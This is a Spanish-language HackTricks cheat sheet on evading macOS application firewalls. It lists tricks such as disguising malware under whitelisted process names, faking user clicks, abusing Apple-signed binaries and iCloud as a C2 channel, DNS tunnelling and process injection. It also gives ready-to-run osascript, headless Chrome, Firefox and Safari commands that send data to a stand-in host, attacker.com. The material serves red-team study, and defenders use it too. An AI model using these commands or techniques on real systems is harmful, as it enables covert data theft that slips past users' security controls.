macOS Bypassing Firewalls
Reading time: 3 minutes
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.
Técnicas encontradas
Las siguientes técnicas se encontraron funcionando en algunas aplicaciones de firewall de macOS.
Abusando de nombres en la lista blanca
- Por ejemplo, llamar al malware con nombres de procesos bien conocidos de macOS como
launchd
Clic sintético
- Si el firewall pide permiso al usuario, hacer que el malware haga clic en permitir
Usar binarios firmados por Apple
- Como
curl
, pero también otros comowhois
Dominios de Apple bien conocidos
El firewall podría estar permitiendo conexiones a dominios de Apple bien conocidos como apple.com
o icloud.com
. Y iCloud podría ser utilizado como un C2.
Bypass genérico
Algunas ideas para intentar eludir firewalls
Verificar tráfico permitido
Conocer el tráfico permitido te ayudará a identificar dominios potencialmente en la lista blanca o qué aplicaciones tienen permiso para acceder a ellos.
lsof -i TCP -sTCP:ESTABLISHED
Abusando de DNS
Las resoluciones DNS se realizan a través de la aplicación firmada mdnsreponder
que probablemente estará permitida para contactar servidores DNS.
.png)
A través de aplicaciones de navegador
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
A través de inyecciones de procesos
Si puedes inyectar código en un proceso que tiene permiso para conectarse a cualquier servidor, podrías eludir las protecciones del firewall:
Referencias
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.